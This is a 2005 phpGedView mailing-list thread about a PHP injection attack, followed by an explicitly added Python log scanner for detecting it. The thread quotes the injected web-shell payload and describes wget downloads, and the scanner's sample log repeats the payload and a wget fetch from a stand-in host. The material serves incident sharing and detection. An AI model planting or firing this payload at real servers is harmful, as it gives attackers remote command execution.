Re: [Phpgedview-talk] attack attempt
From: Matthew G. <ma...@po...> - 2005-12-20 20:07:07
wget is a command line tool for downloading web pages. You can use it for
mirroring pages (making local copies of pages) and all sorts. It's a very
useful little tool, and is commonly installed on unix-like operating
systems. In this case the attacker is trying to use it to download some
program (to do something - who knows what, but I bet it's not friendly).
On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates <ma...@po...> schrieb:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a
> linux binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
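As an added example (not part of this thread or of phpGedView), here is a small Python scanner in the spirit of "grep your logs for wget": it URL-decodes each request line of a constructed Apache-style access log and flags the injected PHP fragments quoted above together with wget follow-up requests. The addresses, paths and the `email` query parameter in the sample log are assumptions; only the payload fragments and the `suntzu` key come from the thread.

```python
import re
from urllib.parse import unquote_plus

# Fragments of the injected PHP quoted in the thread; matched after URL-decoding.
INJECTION_MARKERS = ("error_reporting(0)", "system($_GET[", "HiMaster!")
# Second-stage fetch the thread describes: the injected shell runs wget.
WGET_RE = re.compile(r"\bwget\b", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed Apache-style access log (addresses, paths and parameter names are
# made up for this example). Line 2 carries the quoted payload URL-encoded in a
# registration query string; line 3 is the follow-up command via the $_GET key.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2005:19:58:01 +0000] "GET /pgv/index.php?ged=demo HTTP/1.1" 200 5120
203.0.113.5 - - [20/Dec/2005:19:58:07 +0000] "GET /pgv/register.php?email=%5C%27%3Berror_reporting%280%29%3Bif%28isset%28%24suntzu%29%29%7Bsystem%28%24_GET%5Bsuntzu%5D%29%3Bdie%28%5C%27HiMaster%21%5C%27%29%3B%7Decho%5C%27 HTTP/1.1" 302 -
203.0.113.5 - - [20/Dec/2005:19:58:12 +0000] "GET /pgv/index.php?suntzu=wget%20http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 17
198.51.100.9 - - [20/Dec/2005:20:01:44 +0000] "GET /pgv/view.php?id=1 HTTP/1.1" 200 8211
"""


def classify(line):
    """Return the findings for one access-log line (empty list if it looks clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Decode twice: a double-encoded payload would survive a single decode.
    decoded = unquote_plus(unquote_plus(m.group("target")))
    findings = [f"php-injection:{marker}" for marker in INJECTION_MARKERS if marker in decoded]
    if WGET_RE.search(decoded):
        findings.append("wget-download")
    return findings


def scan(log_text):
    """Group findings by client address so one host's full sequence is visible.

    Only the request line is inspected: POST bodies never reach the access log,
    so the wget follow-up request is often the more reliable indicator.
    """
    hits = {}
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            hits.setdefault(line.split(" ", 1)[0], []).extend(findings)
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        print(ip, findings)
```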